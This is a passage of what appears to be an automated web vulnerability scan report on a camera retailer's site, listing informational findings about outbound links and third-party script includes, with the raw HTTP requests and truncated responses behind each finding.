...[SNIP]...
<li>
           
           
               <a href="http://www.dotlinecorp.com/index4.html" target="_blank">RPS Studio</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.rycote.com/" target="_blank">Rycote</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sachtler.com/" target="_blank">Sachtler</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.samsontech.com/products/brandpage.cfm?brandID=2" target="_blank">Samson</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.samsonite.com/global/globl_homepage.jsp" target="_blank">Samsonite</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.samsung.com/" target="_blank">Samsun Digital World</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.samsungcamerausa.com/" target="_blank">Samsung Camera</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.phoenixcorp.com/" target="_blank">Samyang</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sandisk.com/" target="_blank">SanDisk</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sanus.com/" target="_blank">Sanus Systems</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sanyo.com/home.cfm" target="_blank">Sanyo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tiffen.com/" target="_blank">Saunders</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.savagepaper.com/" target="_blank">Savage</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.schneideroptics.com/" target="_blank">Schneider Optics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.scopearmor.com/" target="_blank">Scope Armor</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.scopetronix.com/" target="_blank">Scopetronix</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.fjwestcott.com/products/scrimjim.htm" target="_blank">Scrim Jim</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.seaandsea.com/" target="_blank">Sea & Sea</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.camerachina.com/index.html" target="_blank">Seagull</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.neschenamericas.com/websites/sealbrands/sealweb.nsf" target="_blank">Seal</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sealife-cameras.com/" target="_blank">Sealife</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sekonic.com/main/" target="_blank">Sekonic</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sennheiserusa.com/newsite/" target="_blank">Sennheiser</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.seriousmagic.com/" target="_blank">Serious Magic</a>
...[SNIP]...
<li>
           
           
               <a href="http://sharp-world.com/index.html" target="_blank">Sharp Corp.</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sharpusa.com/?" target="_blank">Sharp Electronics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.shootsmarter.com/" target="_blank">ShootSmarter</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.shorelinecases.com/" target="_blank">Shoreline</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.shure.com/index.htm" target="_blank">Shure</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sigmaphoto.com/" target="_blank">Sigma</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.simaproducts.com/" target="_blank">Sima</a>
...[SNIP]...
<li>
           
           
               <a href="http://simmonsoptics.com/" target="_blank">Simmons</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sky-spot.com/" target="_blank">Sky Spot</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.thkphoto.com/products/slik/index.html" target="_blank">Slik</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.smartdisk.com/eWeb/smartdiskus/www/" target="_blank">SmartDisk</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.smartpartsproducts.com/" target="_blank">Smartparts</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.smartsound.com/" target="_blank">SmartSound</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.smithvictor.com/index2.asp" target="_blank">Smith Victor</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bisque.com/" target="_blank">Software Bisque</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.solidmounts.com/" target="_blank">SolidMounts</a>
...[SNIP]...
<li>
           
           
               <a href="http://bssc.sel.sony.com/BroadcastandBusiness/minisites/HDV1080/HVR-V1U/index.html" target="_blank">Sony Broadcast</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sonystyle.com/is-bin/INTERSHOP.enfinity/eCS/Store/-/-/-/Default_Storefront-Start" target="_blank">Sony Camera and Video</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sony.com/index.php" target="_blank">Sony Music and Audio</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sorensonmedia.com/" target="_blank">Sorenson Media</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.soundpix.com/homewin.asp" target="_blank">SoundPix</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bkaphoto.com/search_results.asp?searchterm=SP%20Studio" target="_blank">SP Studio Systems</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.speedotron.com/" target="_blank">Speedotron</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.spraywayinc.com/" target="_blank">SprayWay</a>
...[SNIP]...
<li>
           
           
               <a href="http://sprintsystems.com/" target="_blank">Sprint</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.starlightinstruments.com/" target="_blank">Starlight Instruments</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.starrynight.com/" target="_blank">Starry Night</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.steadicam.com/" target="_blank">SteadiCam</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.steiner-binoculars.com/" target="_blank">Steiner</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.stofen.com/" target="_blank">Sto-Fen</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.stoneeditions.com/" target="_blank">Stone Editions</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tiffen.com/Header_page_Stroboframe.htm" target="_blank">Stroboframe</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.studiodynamics.com/muslin_backdrops_by_studio_dyn.html" target="_blank">Studio Dynamics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.rtsphoto.com/html/studbal.html" target="_blank">Studioball</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.sunpak.com/" target="_blank">Sunpak</a>
...[SNIP]...
<li>
           
           
               <a href="http://swarovskioptik.com/?l=en" target="_blank">Swarovski Optik</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.swift-optics.com/" target="_blank">Swift</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.swift-optics.com/" target="_blank">Swift Sport Optics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.swingdesign.com/" target="_blank">Swing</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.switronix.com/" target="_blank">Switronix</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tdk.com/" target="_blank">T D K</a>
...[SNIP]...
<li>
           
           
               <a href="http://takahashiamerica.com/catalog/" target="_blank">Takahashi</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tamrac.com/" target="_blank">Tamrac</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tamron.com/" target="_blank">Tamron</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.targus.com/global/splash.aspx" target="_blank">Targus</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tasco.com/" target="_blank">Tasco</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.televue.com/home/default_3.asp" target="_blank">Tele Vue</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tenba.com/" target="_blank">Tenba</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.testrite.com/" target="_blank">Testrite</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tetenal.co.uk/" target="_blank">Tetenal</a>
...[SNIP]...
<li>
           
           
               <a href="http://users.aol.com/shellfoto/flash.html" target="_blank">The Shell</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.thousandoaksoptical.com/" target="_blank">Thousand Oaks</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tiffen.com/" target="_blank">Tiffen</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.thkphoto.com/" target="_blank">Tokina</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tomtom.com/" target="_blank">TomTom</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.lamborghini.it/" target="_blank">Tonino Lamborghini</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.toshiba.com/tai/" target="_blank">Toshiba</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.toshibadirect.com/td/b2c/home.to" target="_blank">Toshiba labtops</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.totaltraining.com/" target="_blank">Total Training</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.toyoview.com/" target="_blank">Toyo</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.transcendusa.com/" target="_blank">Transcend</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.trek-tech.com" target="_blank">Trek-Tech</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tribecalabs.com/" target="_blank">Tribeca Labs</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.ulead.com/runme.htm" target="_blank">Ulead</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.uwkinetics.com/home.php" target="_blank">Underwater Kinetics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.unibind.com/" target="_blank">Unibind</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.unitedmediainc.com/home/" target="_blank">United Media</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.usbcell.com/" target="_blank">USBCell</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vanguardworld.com/index.php/en/home.html" target="_blank">Vanguard</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.varizoom.com/" target="_blank">VariZoom</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.velbon-tripod.com/" target="_blank">Velbon</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.verbatim.com/" target="_blank">Verbatim</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.viastone.net/" target="_blank">ViaStone</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.videosmith.com/shop/" target="_blank">Videosmith</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vidprousa.com/" target="_blank">VidPro</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bron.ch/vt_home_en/index.php" target="_blank">Visatec</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.visibledust.com/" target="_blank">Visible Dust</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.visitmpg.com/" target="_blank">Visit MPG/Hensel</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.omegasatter.com/v2/products/displaybrand.cfm?BrandID=19" target="_blank">Visual Plus</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vitecmm.com/" target="_blank">Vitec MultiMedia</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vivitar.com/" target="_blank">Vivitar</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vixenoptics.com/" target="_blank">Vixen</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.voigtlaender.de/cms/voigtlaender/voigtlaender_cms.nsf/id/pa_home_e.html" target="_blank">Voigtlander</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vortexmedia.com/" target="_blank">Vortex Media</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.hpmarketingcorp.com/" target="_blank">Vue All</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.vupointsolutions.com/" target="_blank">VuPoint Solutions</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.wacom.com/#" target="_blank">Wacom</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.walkstool.com/" target="_blank">Walkstool</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bkaphoto.com" target="_blank">Watson</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.weaveroptics.com/RiflescopeList.html" target="_blank">Weaver</a>
...[SNIP]...
<li>
           
           
               <a href="http://os.shopwebway.com/" target="_blank">Webway</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.omegasatter.com/v2/products/displaybrand.cfm?BrandID=123" target="_blank">Wein</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.wescomfg.com/index.htm" target="_blank">Wesco</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.fjwestcott.com/" target="_blank">Westcott</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.bkaphoto.com" target="_blank">Weston</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.williamoptics.com/" target="_blank">William Optics</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.winchester.com/" target="_blank">Winchester</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.wista.co.jp/e_wista/english.htm" target="_blank">Wista</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.wolverinedata.com/" target="_blank">Wolverine</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.xacto.com/" target="_blank">X-acto</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.gretagmacbeth.com" target="_blank">X-Rite</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.kyoceraimaging.com/" target="_blank">Yashica</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.zeiss.com/" target="_blank">Zeiss</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.zerohalliburton.com/" target="_blank">Zero Halliburton</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.zigview.co.uk/" target="_blank">ZigView</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.tiffen.com/products.html?tablename=zing" target="_blank">Zing</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.omegasatter.com/v2/products/displaycategory.cfm?CatID=4" target="_blank">Zonal Pro</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.zoomalbum.com/" target="_blank">ZoomAlbum</a>
...[SNIP]...
<li>
           
           
               <a href="http://www.ztsinc.com/" target="_blank">ZTS Inc.</a>
...[SNIP]...
</div>

<a href="http://www.adoramarentals.com" target="new" onClick="_gaq.push(['_trackEvent', 'banner', 'Renatals']);"><img src="/artworks2/Rentals_Banner.gif" border="0" align="middle" alt="Rental Department">
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a>
...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

5.7. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /catalog.tpl?op=Process&func=SendGiftCert HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:33 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 36386

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
</a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books">
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
</form>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.js"></script>
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a>
...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

5.8. http://www.adorama.com/ps/catalog.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ps/catalog.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ps/catalog.pl?op=trackorder_login\ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 14
X-Powered-By: ASP.NET
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32891

<HTML>
   <HEAD>
       <TITLE></TITLE>
       
           
<LINK rel="stylesheet" href="/Ainc/stylesheet.css">
<!--Begin Preload Script -->
<SCRIPT TYPE="text/javascript">
<!--

function n
...[SNIP]...
<TD colspan="2" class="tdleftnav"><A class="linkleftnav" href="http://www.adoramarentals.com" target="new">Rentals / Studio</A>
...[SNIP]...
</a> &#183;
           <a href="http://www.adoramarentals.com" target="new" class="FooterLink">Rental/Studio</a>
...[SNIP]...

5.9. http://www.adorama.com/searchsite/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /searchsite/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /searchsite/default.aspx?category=1000004 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 11
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:31:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130465


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="http://ww
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a>
<a href="http://www.adoramapix.com" id="pix" class="pixsid">
<img src="http://www.adorama.com/artworks2/topnav_pix.gif" alt="AdoramaPix" />
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com" class="pixsid">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com" class="pixsid">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books" class="pixsid"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="http://www.adorama.com/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
<DIV class="WatchTour">
               <a id="ctl00_RecordList_ctl08_EachRecord_VideoLink" onclick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&amp;vsr_sku=ASN53JQA1', 'popup','width=500,height=400,resizable=1');return false;" href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&amp;vsr_sku=ASN53JQA1" target="new"> Watch Product tour</a>
...[SNIP]...
<TD width="0" valign="top">
   
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">DigitalPrints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">PhotoBooks</a>
...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 19 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.adorama.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:25 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...
<link rel="canonical" href="http://www.adorama.com/"/>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.3.min.js"></script>
...[SNIP]...

6.2. http://www.adorama.com/CARS80N3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /CARS80N3.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CARS80N3.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52562

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.3. http://www.adorama.com/CZDRHSCA.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /CZDRHSCA.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CZDRHSCA.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
